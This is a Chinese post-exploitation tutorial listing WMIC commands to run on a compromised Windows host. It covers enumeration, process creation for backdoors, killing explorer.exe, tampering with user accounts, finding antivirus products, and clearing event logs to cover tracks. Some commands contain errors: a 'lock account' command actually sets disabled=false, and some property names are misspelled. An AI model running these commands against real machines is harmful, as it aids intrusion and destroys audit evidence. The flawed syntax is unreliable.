實(shí)用的后滲透wmic命令

寫在前面的話

在這篇文章中,我們將討論如何在攻擊的后滲透利用階段使用WMIC(Windows Management InstrumentationCommand Line)。當(dāng)攻擊者在遠(yuǎn)程PC上拿到meterpreter會話之后,他們就可以枚舉大量的系統(tǒng)信息,并利用WMI命令行工具來進(jìn)行更深程度的操作。

首先,我們會介紹如何拿到遠(yuǎn)程PC的meterpreter會話。拿到會話之后,我們還會告訴大家如何提權(quán)至管理員權(quán)限。

WMIC命令行可以通過Windows CMD來訪問,直接在meterpreter shell中輸入“shell“即可。接下來,我們一起看一看WMIC命令以及相應(yīng)的工作機(jī)制。

WMIC

下面這個命令可以查看WMIC命令的全局選項(xiàng),WMIC全局選項(xiàng)可以用來設(shè)置WMIC環(huán)境的各種屬性,通過結(jié)合各種全局選項(xiàng)以及參數(shù),我們就可以通過WMIC環(huán)境來管理整個系統(tǒng)了。

wmic /?

獲取系統(tǒng)角色、用戶名和制造商

銅鼓WMIC命令的操作系統(tǒng)指令,我們可以枚舉出大量關(guān)于目標(biāo)系統(tǒng)的信息,包括主機(jī)名、域名、制造商以及設(shè)備型號等等。

我們還可以添加下列過濾器來獲取更精準(zhǔn)的掃描結(jié)果:

Roles:它可以給我們提供目標(biāo)設(shè)備在整個網(wǎng)絡(luò)系統(tǒng)中所扮演的角色,例如工作站、服務(wù)器或個人PC等等。

Manufacturer:它可以給我們提供目標(biāo)系統(tǒng)的制造商和設(shè)備型號,因?yàn)槟承┨囟ㄖ圃焐趟a(chǎn)的特定型號設(shè)備會存在特定的漏洞,因此我們可以利用這部分信息來尋找存在漏洞的設(shè)備。

UserName:它可以給我們返回系統(tǒng)的用戶名,我們可以利用這部分信息來區(qū)分誰是管理員誰是普通用戶。

[/format:list]:以列表格式輸出數(shù)據(jù)并排列。

wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles/format:list

獲取SID

為了枚舉出SID,我們需要用到WMIC的group選項(xiàng):

wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

如下圖所示,我們已經(jīng)查找到了賬戶名、域名、本地組成員狀態(tài)、SID以及相應(yīng)的狀態(tài):

創(chuàng)建一個進(jìn)程

WMIC命令的process選項(xiàng)可以幫助我們在目標(biāo)用戶的系統(tǒng)中創(chuàng)建各種進(jìn)程。這種功能可以幫助我們創(chuàng)建后門,或占用大量目標(biāo)系統(tǒng)的內(nèi)存:

wmic process call create “[Process Name]”

wmic process call create “taskmgr.exe”

你可以從下圖中看到,這個命令不僅會創(chuàng)建一個進(jìn)程,而且還會賦予相應(yīng)的進(jìn)程ID,所以我們就可以根據(jù)我們的需要來修改進(jìn)程信息了。

注意:如果進(jìn)程創(chuàng)建了一個類似任務(wù)管理器和CMD這樣的窗口,那么這條命令將會在目標(biāo)系統(tǒng)中打開這個窗口,這樣會引起目標(biāo)用戶的懷疑。

修改進(jìn)程優(yōu)先級

WMIC命令的process選項(xiàng)還可以幫我們修改目標(biāo)系統(tǒng)中運(yùn)行進(jìn)程的優(yōu)先級,這是一個非常有用的功能。降低某個進(jìn)程的優(yōu)先級可能會導(dǎo)致特定的應(yīng)用程序發(fā)生崩潰,而提升某個進(jìn)程的優(yōu)先級甚至還會導(dǎo)致整個系統(tǒng)發(fā)生崩潰。

wmic process where name=”explorer.exe” call set priority 64

終止進(jìn)程

WMIC命令還可以幫我們終止目標(biāo)系統(tǒng)正在運(yùn)行的進(jìn)程:

wmic process where name=”explorer.exe” call terminate

獲取可執(zhí)行文件列表

下面的命令可以枚舉出整個系統(tǒng)中所有可執(zhí)行文件的路徑地址:

wmic process where “NOT ExecutablePath LIKE ‘%Windows%’” GET ExecutablePath

獲取目錄屬性

WMIC命令的fsdir選項(xiàng)可以提取目標(biāo)系統(tǒng)中文件目錄的基本信息,其中包括壓縮方法、創(chuàng)建日期、文件大小、是否可讀寫、是否為系統(tǒng)文件、加密狀態(tài)以及加密類型等等:

wmic fsdir where=”drive=’c:’ and filename=’test’” get /format:list’

獲取文件屬性

WMIC命令的datafile選項(xiàng)可以獲取目標(biāo)系統(tǒng)中文件的基本信息,其中包括壓縮方法、創(chuàng)建日期、文件大小、是否可讀寫、是否為系統(tǒng)文件、加密狀態(tài)以及加密類型等等:

wmic datafile where=’[Path of File]’ get /format:list

wmic datafile where name=’c:\\windows\\system32\\demo\\demo.txt’ get /format:list

定位系統(tǒng)文件

WMIC可以提取出所有重要系統(tǒng)文件的路徑,例如temp目錄和win目錄等等:

wmic environment get Description, VariableValue

獲取已安裝的應(yīng)用程序列表

wmic product get name

獲取正在運(yùn)行的服務(wù)列表

獲取到正在運(yùn)行的服務(wù)列表之后,WMIC還可以提供服務(wù)的啟動模式,例如“自動”、“手動”和“運(yùn)行中”:

wmic service where (state=”running”) get caption, name, startmode

獲取系統(tǒng)驅(qū)動詳情

sysdrive選項(xiàng)可以枚舉出驅(qū)動的名稱、路徑和服務(wù)類型等數(shù)據(jù):

wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

獲取操作系統(tǒng)詳情

os選項(xiàng)可以列舉出目標(biāo)系統(tǒng)的上一次啟動時間、注冊的用戶數(shù)量、處理器數(shù)量、物理/虛擬內(nèi)存信息和安裝的操作系統(tǒng)類型等等:

wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpdate,NumberofProcesses, NumberofUsers, Organization, RegisteredUsers, Status/format:list

獲取主板信息和BIOS序列號

wmic baseboard, get Manufacturer, Product, SerialNumber, Version


wmic bios, get serialNumber

獲取內(nèi)存緩存數(shù)據(jù)

memcache選項(xiàng)可以獲取到內(nèi)存緩存名和塊大小等信息:

wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

獲取內(nèi)存芯片信息

memorychip選項(xiàng)可以獲取到RAM的相關(guān)信息,例如序列號等等:

wmic memorychip get PartNumber, SerialNumber

判斷目標(biāo)系統(tǒng)是否為虛擬機(jī)

我們可以根據(jù)onboarddevice選項(xiàng)返回的信息來判斷目標(biāo)系統(tǒng)到底是真實(shí)的主機(jī)操作系統(tǒng),還是一臺虛擬機(jī)(VMware或Virtual Box):

wmic onboarddevice get Desciption, DeviceType, Enabled, Status /format:list

用戶賬號管理

鎖定用戶賬號

我們可以使用useraccount選項(xiàng)來鎖定本地用戶賬號:

wmic useraccount where name=’demo’ set disabled=false

用戶賬號重命名

wmic useraccount where name=’demo’ rename hacker

限制用戶修改密碼

我們還可以限制本地用戶的密碼修改操作:

wmic useraccount where name=’hacker’ set passwordchangeable=false

獲取反病毒產(chǎn)品詳情

我們可以枚舉出目標(biāo)系統(tǒng)安裝的反病毒產(chǎn)品信息,包括安裝位置和版本:

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

清理系統(tǒng)日志

WMIC命令的nteventlog選項(xiàng)還可以清除系統(tǒng)的日志記錄,當(dāng)你入侵了某個系統(tǒng)之后,這個命令可以幫助你掩蓋攻擊痕跡:

wmic nteventlog where filename='[logfilename]’ cleareventlog

wmic nteventlog where filename=’system’ cleareventlog

*參考來源:hackingarticles

轉(zhuǎn)載原文來自:https://blog.csdn.net/discover2210212455/article/details/82711930

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容